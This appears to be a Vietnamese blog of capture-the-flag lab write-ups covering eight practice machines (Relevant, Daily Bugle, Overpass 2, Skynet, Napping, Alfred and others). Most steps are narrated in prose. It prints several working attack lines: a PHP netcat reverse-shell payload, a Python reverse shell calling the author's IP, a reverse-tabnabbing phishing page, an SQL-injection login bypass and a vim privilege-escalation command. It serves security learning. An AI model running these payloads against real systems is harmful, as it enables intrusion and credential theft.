Ducker

Relevant

Mon, 22 Sep 2025 00:00:00 GMT

import { Aside } from 'astro-pure/user'

Thu thập thông tin

Nmap scan

Sử dụng công cụ nmap mình tìm được 2 port HTTP và 1 port SMB có khả năng khai thác.

Truy cập vào 2 trang Web thì cả 2 đều có giao diện Web mặc định của IIS.

Gobuster

Sử dụng công cụ gobuster, mình scan ra được một đường dẫn như sau:

/nt4wrksv             (Status: 301) [Size: 159]

Nhưng khi truy cập thì là một trang trống và không có gì.

Dịch vụ SMB

Liệt kê danh sách thư mục share của mục tiêu, mình tìm thấy một thư mục giống như đường dẫn scan từ gobuster.

Truy cập vào thư mục này thì mình phát hiện một file tên passwords.txt, nhìn vào nội dung file thì đây là mật khẩu được mã hóa base64 khá quen thuộc.

Giải ra thì mình nhận được mật khẩu của người dùng Bob và Bill.

Mình cũng thử truy cập lại trang web với đường dẫn kèm file này, thì mình xác nhận được là nó đã truy cập cùng một thư mục.

Flag 1

Upload reverse shell

Từ các thông tin tìm được, mình thực hiện upload một reverse shell với định dạng .aspx của borjmz vì đây là server IIS, nó sẽ hỗ trợ thực thi file này rất tốt.

Truy cập iis apppool và flag

Sau khi up load shell thành công, mình mở một listener netcat và truy cập vào file reverse shell vừa upload thì mình đã chiếm được quyền truy cập vào iis apppool\defaultapppool

Và mình tìm thấy flag tại file user.txt trong thư mục Desktop của người dùng Bob.

Flag 2

PrintSpoofer

Khi kiểm tra các đặc quyền của người dùng này, mình phát hiện đặc quyền SeImpersonatePrivilege đang enabled.

Có một bản khai thác công khai có tên PrintSpoofer. Mình thực hiện chuyển file này sang máy mục tiêu và do trước đó mình dùng SMB nên không biết đường dẫn trong máy của file này nằm ở đâu nên mình tìm và thấy nó nằm tại C:\inetpub\wwwroot\nt4wrksv.

Truy cập vào SYSTEM và flag

Thực thi file và mình đã chiếm được quyền truy cập vào SYSTEM.

Cuối cùng mình tìm thấy flag tại thư mục Desktop của Administrator.

Daily Bugle

Fri, 19 Sep 2025 00:00:00 GMT

Thu thập thông tin

Truy cập vào mục tiêu thì đây là trang báo lá cải của Daily Bugle (fan Spider-man sẽ khá quen thuộc với chỗ này).

Trang này có một bài với tiêu đề "Spider-Man cướp ngân hàng!" và bên cạnh có một form đăng nhập.

Và ở /robots.txt có leak về trang /administrator.

Sau khi tìm hiểu thì mình tìm thấy một công cụ của OWASP có tên là JoomScan dành riêng cho CMS này. Nó có thể thu thập thông tin phiên bản, lỗ hổng dựa trên phiên bản,...

Sử dụng công cụ, phiên bản của Joomla CMS là 3.7.0.

Ở phiên bản này tồn tại lỗ hổng SQLi.

Lỗ hổng này được báo cáo và cách khai thác như sau:

Flag 1

Truy cập người dùng apache

Mình sử dụng công cụ SQLmap để khai thác lỗ hổng này và trích xuất được database joomla có 72 bảng dữ liệu.

Nhưng mình đã thử nhiều cách vẫn không dump dữ liệu của các bảng này được.

Do đó, mình tìm kiếm thêm thông tin thì thấy có PoC này có script python khai thác và dump bảng users và session.

Khi thực thi file, mình tìm được thông tin của người dùng Jonah kèm theo một hash mật khẩu.

Sử dụng công cụ John the Ripper với wordlist rockyou.txt thì mình giải hash này ra được mật khẩu gốc.

Sử dụng thông tin đăng nhập này, mình đăng nhập vào /administrator thì được chuyển đến trang Control Panel.

Ở trang Templates mình phát hiện ở đây quản lý các template được dựng bằng PHP và có thể thực thi nó.

Tại đây, mình sử dụng reverse shell của pentestmonkey và chèn vào tempalte này.

Sau khi chọn Tempalte Preview, file này sẽ thực thi và kết nối đến listener netcat của mình.

Nhưng quyền hiện tại không thể truy cập đến thư mục /home của jjameson.

Truy cập người dùng jjameson và flag

Khi mình tìm trong thư mục của webserver, mình phát hiện bên trong file configuration.php có thông tin user và password. Nhưng dùng để đăng nhập thì không được.

Tuy nhiên, khi mình dùng mật khẩu này đăng nhập vào jjameson thì thành công và tìm thấy flag tại thư mục /home của người dùng này.

Flag 2

Sudo Misconfiguration (Yum)

Từ jjameson mình thấy trong danh sách sudo người dùng này có thể thực thi yum với sudo mà không cần mật khẩu.

Tại GTFOBins có hướng dẫn cách tận dụng yum để thực hiện leo thang đặc quyền.

Từ thông tin trên, mình thực hiện tạo package với lệnh ghi jjameson ALL=(ALL:ALL) NOPASSWD:ALL vào file quản lý quyền sudo và nó sẽ cho phép jjameson tất cả các quyền thực thi bằng sudo mà không cần mật khẩu.

Truy cập người dùng root và flag

Mọi thứ đã chuẩn bị xong, mình chuyển file này sang máy mục tiêu và cài đặt package vào máy thông qua tùy chọn localinstall của yum.

Khi cài đặt thành công, mình đã có mọi thứ mình muốn, có thể chuyển sang root dễ dàng và lấy flag tại thư mục /root.

Overpass 2 Hacked

Thu, 18 Sep 2025 00:00:00 GMT

Forensics - Phân tích PCAP

Overpass đã bị hack! Đội SOC (Paradox, chúc mừng vì được thăng chức) đã phát hiện hoạt động đáng ngờ trong một ca trực đêm muộn khi đang xem shibes, và đã kịp thời bắt gói tin trong lúc cuộc tấn công diễn ra.

Từ thông tin trên mình nhận được file overpass2_1595383502269.pcapng.

Phân tích sơ qua mình thấy một stream bắt được khi kẻ tấn công upload reverse shell thông qua /development/upload.php với payload:

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

Người này sau khi có được shell đã thực hiện truy cập sang người dùng james.

Kẻ này đã thiết lập một persistence bằng cách cài một backdoor.

Tại đây, hắn cũng lấy thông tin file shadow, mình cũng sử dụng file này kèm theo wordlist fasttrack thì giải mã được mật khẩu của 4 tài khoản.

Research - Phân tích mã nguồn

Kiểm tra mã nguồn một chút thì backdoor này sử dụng hash mặc định là:

Kèm theo đó có salt là:

Nhưng khi thực thi backdoor thì kẻ tấn công dùng một hash khác là:

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

Từ các thông tin trên mình sẽ giải mã hash mà kẻ tấn công đã sử dụng, trong mã nguồn backdoor này sử dụng thuật toán hash SHA512 kèm salt:

Công cụ hashcat có hỗ trợ thuật toán này ở mode 1710 và sau khi giải xong mình đã có được plain text.

Attack - Get back in!

Từ các thông tin trên, mình truy cập vào website mục tiêu thì thấy nó đã bị kẻ tấn công deface.

Mình thực hiện SSH vào james với các thông tin mình tìm được, nhưng không có quyền truy cập.

Vấn đề nằm ở đây, kẻ tấn công không SSH vào port mặc định (22) mà SSH vào port 2222.

Sau khi SSH ở port 2222 thì mình đã có quyền truy cập vào người dùng james.

Tại thư mục /home của james, mình tìm thấy flag trong file user.txt.

Và cũng tại đây kẻ tấn công đã để lại một file thực thi bị ẩn .suid_bash.

Sau một tí thời gian, khi thực thi file và tìm hiểu thì mình thực thi lệnh theo hướng dẫn.

Type `./.suid_bash -c "help set"' for more information about shell options.

Trong này mình tìm thấy tùy chọn -p có vẻ sẽ giúp mình leo thang đặc quyền.

Khi thực thi thành công, mình đã có quyền root và tìm thấy flag trong file root.txt tại thư mục /root.

Game Zone

Wed, 17 Sep 2025 00:00:00 GMT

import { Aside } from 'astro-pure/user'

Link lab

Chiếm quyền truy cập thông qua SQLi

Khi truy cập vào mục tiêu, tại trang chủ có một form đăng nhập.

Tại đây tồn tại lỗ hổng SQLi, mình chèn ' or 1=1 -- vào ô username để bypass đăng nhập.

Khi thực thi thành công mình được chuyển tới trang /portal, đồng thời xác nhận được lỗ hổng SQLi đang tồn tại ở trang này.

Công cụ SQLMap

Lưu request lúc nãy vào file request.txt và sử dụng công cụ SQLMap khai thác và trích xuất dữ liệu.

Sau khi khai thác xong, mình trích xuất được 2 bảng như sau:

Database: db
Table: users
[1 entry]
+------------------------------------------------------------------+----------+
| pwd                                                              | username |
+------------------------------------------------------------------+----------+
| ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47  |
+------------------------------------------------------------------+----------+

Database: db
Table: post
[5 entries]
+----+--------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id | name                           | description                                                                                                                                                                                            |
+----+--------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1  | Mortal Kombat 11               | Its a rare fighting game that hits just about every note as strongly as Mortal Kombat 11 does. Everything from its methodical and deep combat.                                                         |
| 2  | Marvel Ultimate Alliance 3     | Switch owners will find plenty of content to chew through, particularly with friends, and while it may be the gaming equivalent to a Hulk Smash, that isnt to say that it isnt a rollicking good time. |
| 3  | SWBF2 2005                     | Best game ever                                                                                                                                                                                         |
| 4  | Hitman 2                       | Hitman 2 doesnt add much of note to the structure of its predecessor and thus feels more like Hitman 1.5 than a full-blown sequel. But thats not a bad thing.                                          |
| 5  | Call of Duty: Modern Warfare 2 | When you look at the total package, Call of Duty: Modern Warfare 2 is hands-down one of the best first-person shooters out there, and a truly amazing offering across any system.                      |
+----+--------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

Tại bảng users có một người dùng agent47 với mật khẩu được hash thành:

ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14

Ngoài ra còn có một bảng khác chứa thông tin các bài đăng.

Giải mã mật khẩu với JohnTheRipper

Mình sử dụng công cụ JohnTheRipper để giải mã mật khẩu này kèm wordlist rockyou.txt.

Sau khi có đầy đủ tên đăng nhập và mật khẩu, mình SSH vào tài khoản này.

Và tại thư mục home của người dùng này mình tìm được flag.

Mở truy cập dịch vụ qua reverse SSH

Reverse SSH port forwarding chỉ định một port trên remote server sẽ được chuyển tiếp đến host và port đã cho ở phía cục bộ

Tại đây mình sẽ dùng công cụ ss để kiểm tra các socket trên máy mục tiêu.

Ý nghĩa các tham số như sau:

-t Hiển thị TCP sockets
-u Hiển thị UDP sockets
-l Chỉ hiển thị listening sockets
-p Hiển thị process đang dùng socket
-n Không phân giải tên dịch vụ

Tại máy tấn công, mình sử dụng SSH tunel với tùy chọn -L để mở kết nối từ port 10000 đến máy mục tiêu.

Khi kết nối thành công, mình truy cập vào web với địa chỉ localhost:10000.

Mình sử dụng thông tin đăng nhập của agent47 để đăng nhập vào web này thì truy cập vào được trang thông tin hệ thống, tại thanh tiêu đề của trang này sẽ có thông tin về phiên bản của nó.

Leo thang đặc quyền bằng Metasploit

Từ các thông tin tìm được, mình tra cứu trên ExploitDB thì thấy phiên bản của CMS này có một lỗ hổng dẫn đến kiểm soát truy cập.

Tìm trên msfconsole thì có module exploit/unix/webapp/x_show_cgi_exec hỗ trợ khai thác.

Một số thông tin yêu cầu phải đặt để có thể khai thác như sau:

Khai thác thành công, msfconsole tạo cho mình 2 session.

Mình truy cập vào session 1 tại đây mình đã có shell với quyền root và flag được đặt tại thư mục /root.

Skynet

Wed, 17 Sep 2025 00:00:00 GMT

import { Aside } from 'astro-pure/user'

Thu thập thông tin

Nmap scan

Kết quả scan từ nmap mình thu được các thông tin như sau:

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) # [!code highlight:1]
| ssh-hostkey: 
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu)) # [!code highlight:1]
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d # [!code highlight:1]
|_pop3-capabilities: PIPELINING UIDL RESP-CODES SASL AUTH-RESP-CODE CAPA TOP
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd # [!code highlight:1]
|_imap-capabilities: LOGIN-REFERRALS more IDLE SASL-IR capabilities have LOGINDISABLEDA0001 LITERAL+ Pre-login post-login IMAP4rev1 ENABLE listed ID OK
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) # [!code highlight:1]
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h39m58s, deviation: 2h53m13s, median: -1s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2025-09-17T03:42:42-05:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2025-09-17T08:42:43
|_  start_date: N/A

Website

Truy cập vào website mục tiêu thì ở trang chủ không có gì đặc biệt, giao diện không thực hiện được chức năng gì.

Samba

Mình kiểm tra dịch vụ Samba có thư mục anonymous có thể truy cập được và bên trong có file attention.txt và thư mục logs.

Bên trong file attention.txt có nội dung như sau:

Một sự cố hệ thống gần đây đã khiến nhiều mật khẩu bị thay đổi. Tất cả nhân viên Skynet được yêu cầu đổi mật khẩu sau khi thấy thông báo này.

– Miles Dyson

Tại thư mục logs có 3 file log1.txt, log2.txt, log3.txt.

Trong đó, log2.txt và log3.txt là file trống. Còn log1.txt có nội dung như sau:

cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator

Nhìn vào danh sách này thì mình suy đoán khả năng là mật khẩu.

Gobuster scan

Sử dụng công cụ gobuster để scan thư mục, mình tìm thấy một số thông tin như sau:

/admin                (Status: 301) [Size: 312] [--> http://10.201.47.98/admin/]
/css                  (Status: 301) [Size: 310] [--> http://10.201.47.98/css/]
/js                   (Status: 301) [Size: 309] [--> http://10.201.47.98/js/]
/config               (Status: 301) [Size: 313] [--> http://10.201.47.98/config/]
/ai                   (Status: 301) [Size: 309] [--> http://10.201.47.98/ai/]
/squirrelmail         (Status: 301) [Size: 319] [--> http://10.201.47.98/squirrelmail/]

Trong đó, tất cả đều trả về mã 403 (Không có quyền truy cập) nhưng chỉ có /squirrelmail truy cập được.

Từ các thông tin thu thập được, mình đã thử sử dụng username milesdyson là tên thư mục share lúc đầu tìm được và kết hợp với mật khẩu trong file log1.txt để brute force trang đăng nhập vào SquirrelMail.

Khi đăng nhập vào, mình phát hiện một mail phản hồi về khi người dùng này yêu cầu reset mật khẩu dịch vụ SMB.

Sử dụng thông tin đăng nhập này đăng nhập vào thư mục share milesdyson lúc đầu, bên trong là một số file PDF và thư mục notes.

Và trong thư mục notes có một đống file khác...

Nhưng đương nhiên, cái gì quan trọng thì mình ưu tiên.

Nội dung bên trong như sau:

1. Add features to beta CMS /45kra24xxx28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

Truy cập vào đường dẫn như file ghi, mình được chuyển tới trang như sau.

Tiếp tục sử dụng gobuster scan tiếp xem bên trong có gì, thì mình phát hiện trang /administrator.

/administrator        (Status: 301) [Size: 341] [--> http://10.201.47.98/45kra24xxx28v3yd/administrator/]

Truy cập vào đường dẫn này, mình được chuyển tới một trang đăng nhập cho administrator.

Flag 1

Lỗ hổng Remote File Inclusion

Tìm trên ExploitDB thì nền tảng CMS này từng có một lỗ hổng Remote File Inclusion.

Lỗ hổng này được giải thích như sau:

Một kẻ tấn công có thể bao gồm (include) các file PHP cục bộ hoặc từ xa, hoặc đọc các file không phải PHP bằng lỗ hổng này. Dữ liệu do người dùng kiểm soát được dùng để tạo tên file sẽ được include vào file hiện tại. Mã PHP trong file đó sẽ được thực thi, mã không phải PHP sẽ được nhúng vào đầu ra. Lỗ hổng này có thể dẫn tới chiếm toàn bộ server.

Nói đơn giản thì máy mục tiêu sẽ lấy file PHP mà mình host và thực thi nó.

Truy cập www-data và flag

Lỗ hổng này khai thác từ URL http://target/cuppa/alerts/alertConfigField.php?urlConfig=.

Phía sau đó sẽ là Remote file hoặc Local file.

Tại đây, mình host một HTTP Server chứa file PHP độc hại với mục đích mở một reverse shell và thực thi lệnh sau để gửi request đến serser (Hoặc cũng có thể thao tác trên browser):

Khi request được gửi, tại listener netcat mình mở sẽ nhận được kết nối ngược lại, mình có quyền truy cập vào www-data và tìm thấy flag tại thư mục /home của người dùng milesdyson.

Flag 2

Cấu hình sai ở dịch vụ crontab

Sau một lúc kiểm tra thì mình tìm thấy dịch vụ crontab đang thực thi một file backup.sh dưới quyền root mỗi phút một lần.

Đây là một lỗ hổng giúp mình leo thang đặc quyền.

Đối với file này, mình không có quyền ghi nên không thể ghi vào file này để leo thang đặc quyền được.

Nhưng có một điều mà người quản lý server này làm rất ẩu, cụ thể file backup.sh có nội dung như sau:

#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

File này có nhiệm vụ di chuyển sang thư mục /var/www/html, sau đó thực thi lệnh tar để nén tất cả mọi thứ trong này lại thành file backup.tgz.

Vấn đề nằm ở dấu * - có nghĩa là tất cả, mình có thể lợi dụng nó để thực thi file mà mình tạo với mục đích ...

Khi tar bắt đầu thực thi, nếu trong thư mục thực thi (ở đây là /var/www/html) tồn tại file có tên chứa -- thì nó sẽ coi như đây là một option thay vì một file.

Truy cập người dùng root và flag

Lợi dụng lỗ hổng này, mình tạo một file reverse shell về listener netcat mình đang mở và tạo 2 file chứa -- với mục đích thực thi file rev-shell.sh.

Đợi crontab thực thi, mình sẽ có được quyền truy cập vào người dùng root và tìm thấy flag tại thư mục /root.

HackPark

Sun, 14 Sep 2025 00:00:00 GMT

import { Aside } from 'astro-pure/user'

Link lab

Sử dụng Hydra brute force trang đăng nhập

Mình tìm một trang đăng nhập để tấn công và xác định yêu cầu mà form thực hiện cho webserver. Thông thường, webserver thực hiện 2 loại request, GET request được sử dụng để yêu cầu dữ liệu từ webserver và POST request dùng để gửi dữ liệu đến webserver.

Thực hiện tìm username bằng chức năng quên mật khẩu của website.

Nếu username tồn tại, webserver sẽ thực hiện gửi thông tin về email của người dùng đó và sẽ có kết quả trả về khác lúc nãy dù hiện tại đang lỗi.

Với hydra mình sửa dụng cú pháp:

hydra -l <USERNAME> -P <PASWORD-WORDLIST> http-post-form "<PATH-URL>:<DATA>:<CONDITION>"

# -l                Sử dụng -L nếu muốn dùng wordlist username.
# http-post-form:
#           Phần data sử dụng ^USER^ và ^PASS^ để công cụ hiểu đang cần chèn username và password vào chỗ nào.
#           Phần condition có cú pháp:
#                   - S:<Condition> nếu điều kiện đúng (Success - Ví dụ S:200 OK => Trả về kết quả nếu request trùng khớp.)
#                   - F:<Condition> nếu điều kiện sai (Fail - Ví dụ F:404 Not found => Bỏ qua các request trùng khớp.)

Mình tìm được mật khẩu của người dùng admin

[80][http-post-form] host: 10.201.59.2   login: admin   password: 1*a*2w*x

Chiếm quyền kiểm soát

Sử dụng thông tin đăng nhập tìm được mình vào được trang Administrator.

Thông tin phiên bản của BlogEngine này tồn tại CVE-2019-6714 cho phép thực thi mã từ xa từ lỗ hổng Path Traversal.

Sử dụng bản khai thác khai thác tại đây mình thực hiện chiếm quyền kiểm soát webserver này.

Tại đây mình chiếm được quyền kiểm soát vào iis apppool\blog.

Leo thang đặc quyền sử dung Metasploit

Sau khi có được quyền truy cập ban đầu, mình sử dụng msfvenom tạo một file độc hại nhằm tạo một reverse shell và nâng cấp shell này lên meterpreter.

Tại máy mục tiêu mình tải file này về và thực thi nó.

Đồng thời, mình mở một listener msfconsole với module windows/meterpreter/reverse_tcp và khi bên máy mục tiêu thực thi file thành công thì mình sẽ có được meterpreter shell.

Kiểm tra sơ qua, máy này có thông tin phiên bản là Windows Server 2012 R2 (6.3 Build 9600).

Trong đó có một dịch vụ gọi là WindowsScheduler có khả năng khai thác, và tại thư mục này mọi người dùng đều có quyền đọc/ghi/sửa.

Kiểm tra các file log, mình phát hiện có một event thực thi Message.exe cứ mỗi 30 giây với quyền Administrator.

Từ các thông tin trên, mình sử dụng msfvenom tạo một file độc hại giả mạo file Message.exe với mục đích reverse shell về máy mình và mở HTTP Server cho bước tiếp theo.

Tại máy mục tiêu mình đổi tên file gốc thành Message.exe.bak (Phòng trường hợp mình làm lỗi gì đó thôi) và tải file độc hại từ máy mình qua, sau đó đợi WindowsScheduler thực thi (khoảng 30 giây).

Khi file được thực thi, mình sẽ có được meterpreter shell với quyền Administrator.

Quyền này chỉ nhỏ hơn SYSTEM thôi nên mình có thể truy cập vào thư mục Desktop của Jeff và xem flag trong file user.txt.

Cuối cùng mình lấy được flag trong file root.txt tại thư mục Desktop của Administrator.

Napping

Fri, 12 Sep 2025 00:00:00 GMT

Thu thập thông tin

Nmap scan

Thực hiện scan port, mình phát hiện 2 port đang mở là ssh và http.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0) # [!code highlight:1]
| ssh-hostkey: 
|   3072 b4:7c:88:fd:ec:42:b4:a3:7f:16:19:bc:b1:5d:01:ca (RSA)
|   256 50:75:65:92:55:06:06:5e:00:8d:19:5b:e9:f0:15:72 (ECDSA)
|_  256 10:cc:c8:0f:99:0c:b2:29:03:e2:6d:a1:2c:69:89:b8 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu)) # [!code highlight:1]
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set # [!code highlight:1]
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Gobuster scan

Dùng công cụ gobuster mình còn tìm ra được /admin nhưng không có quyền truy cập.

/admin                (Status: 301) [Size: 314] [--> http://10.201.102.54/admin/]

Nhưng bên trong /admin mình phát hiện một trang login dành cho admin.

/login.php            (Status: 200) [Size: 1158]

Lỗ hổng target trên thẻ a

Truy cập vào website, mình được chuyển tới trang login của người dùng.

Mình đăng ký tài khoản và vào được một trang nếu mình nhập url và submit, nó sẽ xuất hiện một thẻ a chuyển hướng đến url đó.

Trang này còn nói rằng Tất cả các link đều được review bởi admin, người dựng lên website này!

Có một thông tin nho nhỏ mà thử thách này đưa ra.

To hack into this machine, you must look at the source and focus on the target.

Nhìn kỹ vào mã nguồn thì target='_blank' chính là vấn đề.

Đây là thứ đã gây ra nhiều vụ lừa (phishing) bằng cách ấn vào link và chuyển hướng đến trang giả mạo.

Cụ thể kỹ thuật này sử dụng window.opener.location = '<link web giả mạo>';, khi trang đích chứa js này nó sẽ chuyển hướng trang gốc (cụ thể ở đây là trang chứa target='_blank') sang link web giả mạo.

Flag 1

Truy cập người dùng daniel

Từ các thông tin thu thập được, mình copy source trang login của admin lúc nãy tìm được nhằm mục đích host một trang login giả mạo và lừa admin đăng nhập vào đây để lấy thông tin đăng nhập.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login</title>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <style>
        body{ font: 14px sans-serif; }
        .wrapper{ width: 360px; padding: 20px; }
    </style>
</head>
<body>
    <div class="wrapper">
        <h2>Admin Login</h2>
        <p>Please fill in your credentials to login.</p>


        <form action="/admin/login.php" method="post">
            <div class="form-group">
                <label>Username</label>
                <input type="text" name="username" class="form-control " value="">
                <span class="invalid-feedback"></span>
            </div>    
            <div class="form-group">
                <label>Password</label>
                <input type="password" name="password" class="form-control ">
                <span class="invalid-feedback"></span>
            </div>
            <div class="form-group">
                <input type="submit" class="btn btn-primary" value="Login">
            </div>
            <br>
        </form>
    </div>
</body>
</html>

Mình host thêm một trang để lừa admin bấm vào đây để chuyển hướng đến trang login.html.

<!DOCTYPE html>
<html>
<head>
    <title>Just...</title>
</head>

<body>
    Just nothing...
</body>
<script>window.opener.location = 'http://10.17.67.204:8000/login.html';</script>

</html>

Khi mình submit url http://10.17.67.204/macilious.html

Nếu admin truy cập vào url này, họ sẽ được chuyển tới trang chứa mã javascript của mình.

Và trang gốc của họ sẽ chuyển thành trang đăng nhập admin.

Đồng thời mình cũng bắt các gói tin trên mạng này, khi admin chỉ nghĩ vì một lý do nào đó mà họ bị đăng xuất nên họ thực hiện đăng nhập lại thì mình đã bắt được gói tin chứa thông tin đăng nhập.

Dùng thông tin đăng nhập này SSH vào người dùng daniel và mình tìm thấy flag tại thư mục home của người dùng adrian nhưng không có quyền truy cập.

Mình có quyền sửa file query.py vì thuộc group administrators và file này có chức năng kiểm tra trạng thái website và ghi vào file site_status.txt.

from datetime import datetime
import requests

now = datetime.now()

r = requests.get('http://127.0.0.1/')
if r.status_code == 200:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Site is Up: ")
    f.write(dt_string)
    f.write("\n")
    f.close()
else:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Check Out Site: ")
    f.write(dt_string)
    f.write("\n")
    f.close()

Dựa vào nội dung file site_status.txt thì đây là một crontab được thực hiện mỗi 1 phút

Truy cập người dùng adrian và flag

Từ đó mình có thể dựa vào file này để mở một reverse shell.

Mình thay đổi nội dung file như sau:

import socket,os,pty

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.17.67.204",7304))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/sh")

Sau đó mình mở netcat listener tại port 7304, đợi 1 phút để máy thực thi file kết nối và mình đã đọc được flag.

Flag 2

Mình stabilizing shell để linh hoạt hơn.

Sudo Misconfiguration (Vim)

Kiểm tra với lệnh sudo -l mình thấy người dùng này có thể sử dụng vim với quyền sudo không cần mật khẩu.

Để khai thác, tại gtfobins có hướng dẫn có thể dùng vim để thực thi code python.

Truy cập người dùng root và flag

Với lệnh vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' mình đã có thể leo thang đặc quyền lên root và tìm được flag tại thư mục /root.

Alfred

Thu, 11 Sep 2025 00:00:00 GMT

import { Aside } from 'astro-pure/user'

Vì đây là ứng dụng Windows nên sẽ sử dụng Nishang. Repository này chứa tập hợp các script hữu ích để chiếm quyền truy cập ban đầu, thu thập thông tin và leo thang đặc quyền. Trong trường hợp này sẽ kết hợp sử dụng reverse shell script

Link lab

Truy cập ban đầu

Sử dụng công cụ nmap mình phát hiện 3 port TCP đang mở, trong đó có 2 port đang chạy dịch vụ web.

PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 7.5 # [!code highlight:1]
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
3389/tcp open  ssl/ms-wbt-server? # [!code highlight:1]
| ssl-cert: Subject: commonName=alfred
| Not valid before: 2025-09-10T04:19:14
|_Not valid after:  2026-03-12T04:19:14
|_ssl-date: 2025-09-11T04:23:03+00:00; 0s from scanner time.
8080/tcp open  http               Jetty 9.4.z-SNAPSHOT # [!code highlight:1]
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Đối với port 80, kiểm tra sơ qua thì mình không tìm thấy gì đặc biệt.

Tại port 8080 xuất hiện một trang đăng nhập, kiểm tra sơ bộ thì không có lỗ hổng gì nên mình sử dụng Burp Suite để brute force tài khoản.

Các request có thông tin đăng nhập sai sẽ được chuyển hướng đến /loginError nên mình sẽ thêm xử lý để phân biệt giữa request đăng nhập không thành công và đăng nhập thành công.

Các thành phần mình thực hiện brute force như sau:

Danh sách Usernames.
Danh sách Passwords.
Cluster bomb attack: loại này sẽ brute force đối với mỗi dòng của danh sách 1 sẽ thử với tất cả các dòng của danh sách 2.

Khi brute force sẽ có một request không chuyển hướng đến /loginError mà chuyển hướng đến / và đây cũng là username và password hợp lệ.

Dùng nó để đăng nhập thì mình được chuyển hướng đến dashboard của admin.

Khám phá một xíu thì mình phát hiện bên trong có một trang cho phép thực thi lệnh trên hệ thống và trả kết quả.

Mình thực thi lệnh sau để mở reverse shell, lệnh này có 2 nhiệm vụ:

Đầu tiên kết nối đến Simple HTTP Server của mình và tải script thực hiện kết nối ngược (reverse shell) về máy mình.
Tiếp theo thực thi script đó và bắt đầu kết nối.

Simple HTTP Server mình mở tại port 6565 khi thực thi lệnh sẽ thấy script đã được tải.

Đồng thời khi tải xong, tại netcat mình đang mở listener ở port 7304 cũng đã thực hiện kết nối thành công và mình đã chiếm được quyền truy cập ban đầu ở người dùng bruce.

Flag được đặt tại thư mục Desktop của người dùng này.

Chuyển đổi shell

Để có thể linh hoạt hơn khi sử dụng shell, thay vì dùng raw shell mình sẽ sử dụng Metasploit để nâng cấp lên meterpreter shell.

Lệnh mà mình sẽ thực thi trên web sẽ tải về một file độc hại từ máy mình.

Trước đó, mình sử dụng msfvenom tạo một file độc hại sử dụng để kết nối ngược về máy mình và nâng cấp lên meterpreter shell.

Khi server web thực thi và tải về file độc hại mà mình đã tạo, mình sẽ tạo một listener bằng công cụ msfconsole với module exploit/multi/handler kèm payload windows/meterpreter/reverse_tcp.

